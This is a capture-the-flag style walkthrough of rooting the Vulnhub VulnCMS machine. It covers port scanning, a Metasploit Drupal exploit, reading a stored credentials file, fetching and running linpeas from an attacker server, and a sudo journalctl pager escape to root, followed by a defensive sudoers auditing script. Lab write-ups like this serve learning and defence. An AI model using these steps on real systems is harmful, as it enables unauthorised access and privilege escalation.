VulnCMS Walkthrough – Vulnhub – Writeup

VulnCMS Walkthrough – Vulnhub – Writeup. VulnCMS is an easy machine to root, although the enumeration takes some time even though it is fairly straightforward.

The link to the machine: https://www.vulnhub.com/entry/vulncms-1,710/


Identify the target

Firstly, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Now that I have identified the target, I have to scan for open ports on the machine to find the exposed services.

nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.30 -oN vulncms.nmap

Enumerate CMS

From the screenshot above, we can see that different CMSs (WordPress, Joomla and Drupal) are hosted on different ports, so I decided to enumerate all of them. The scan result also shows an older version of Drupal. However, I started the enumeration with WordPress. Also, when we browse the websites, we can see that the hostname is fsociety.web.

sudo vi /etc/hosts    # add the line: 10.0.2.30 fsociety.web
wpscan --api-token=$WPSCAN_KEY --url http://fsociety.web:5000/ --plugins-detection mixed -e | tee vulncms.wpscan

Here, we can see that there are no known vulnerable plugins. Hence, I moved on to the Joomla CMS.

From this result, we don’t have any vulnerabilities on Joomla either. Lastly, I moved to Drupal.

drupwn --target http://fsociety.web:9001 --mode enum

There was a very famous exploit for Drupal versions below 7.58. So, I switched to the Metasploit framework to exploit the CMS.

msfconsole
search drupal
use 1
set rhosts 10.0.2.30
set rport 9001
set vhost fsociety.web
exploit

Finally, we got the shell.

Privilege escalation to user

Since we have access to the machine, we can now search for database credentials. However, that is not the only way: there is a file in the /opt directory that revealed the credentials of the Joomla CMS.

cd /opt
cat 8081.cred

Using these credentials, we can log in to the Joomla CMS and get the user list. In the user list, there is a user elliot whose email looks like the user’s password on the target machine.

Alternatively, we can get this information from the database credentials stored in a different directory under /var/www/html.

Finally, I could log in using this information.

ssh elliot@10.0.2.30

This way, I got the user flag.

Privilege escalation to root

Now that we have access as this user, we can check what other access he has.

Unfortunately, the user’s shell was rbash, which is a restricted bash. Therefore, I had to find a way to spawn a regular bash. While looking around, I found that python3 was available to the user, so I could spawn another shell using python3.

python3 -c 'import pty;pty.spawn("/bin/bash")'

You can see that I can change to the root of the filesystem now. Thus, I can move on to further enumeration. Although I tried the basic things like sudo permissions, SUID binaries, cron jobs using pspy, etc., I couldn’t find anything. Then, I decided to get linpeas.sh onto the target machine and had to look at the output many times.

On the attacker machine, from the directory where I have linpeas.sh:

python3 -m http.server

On target machine:

wget http://10.0.2.15:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee output # you can look at output after 2 days. xD

After looking for about 1 hour, I got the following.

From the screenshot above, I got the password of the second user, tyrell. So, I logged in via SSH as him.

ssh tyrell@10.0.2.30
sudo -l

The user tyrell had sudo access to a binary that we can exploit.

Reference: https://gtfobins.github.io/gtfobins/journalctl/

sudo journalctl    # the output opens in the pager
!/bin/bash         # typed at the pager prompt; the pager runs it as root
id
cd /root
cat root.txt

In this way, we can root the machine.
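From the defender’s side, the last step is a configuration mistake rather than a software bug: a sudo rule that hands root to a binary which opens an interactive pager. Below is an added example (not part of the original writeup) that audits sudoers-formatted text for exactly that pattern; the sample sudoers content, the user names in it and the binary list are constructed for illustration.

```python
import re
from typing import Dict, List

# Added example, not from the original post: flag sudo rules that hand root to
# an interactive pager (journalctl here). At the pager prompt the caller can run
# commands as root, so the rule is as good as "ALL" unless the pager is disabled.
PAGER_SPAWNERS = {"journalctl", "systemctl", "less", "more", "man"}
NO_PAGER_FLAG = {"journalctl", "systemctl"}  # these honour --no-pager
# user  host=(runas)  TAG:  cmd, cmd ...   (Defaults and alias lines are skipped)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Return one finding per risky command entry in sudoers-formatted text."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for entry in m.group("cmds").split(","):
            parts = entry.split()
            if not parts:
                continue
            binary, args = parts[0].rsplit("/", 1)[-1], parts[1:]
            finding = {"user": m.group("user"), "cmd": entry.strip()}
            if binary == "ALL":
                finding["issue"] = "unrestricted"
            elif binary in PAGER_SPAWNERS and not (
                    binary in NO_PAGER_FLAG and "--no-pager" in args):
                finding["issue"] = "pager-escape"
                finding["fix"] = ("pin arguments and add --no-pager"
                                  if binary in NO_PAGER_FLAG
                                  else "replace with a non-interactive command")
            else:
                continue
            findings.append(finding)
    return findings

# Constructed sample sudoers file; not the real machine's configuration.
SAMPLE_SUDOERS = """\
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
tyrell  ALL=(root) NOPASSWD: /usr/bin/journalctl
elliot  ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -u nginx
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/syslog
"""
```

Because sudo only accepts the exact argument list written in the rule, pinning `--no-pager` (or pointing the rule at a non-interactive command) removes the pager prompt without giving the user broader access.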

Conclusion

This is a fairly easy machine, as I said earlier. However, the last part was a bit tricky because it requires a very subtle observation. Still, the exploits are pretty common and easy to perform. Additionally, I would like to thank Simardeep Singh for the machine. I really appreciate it.
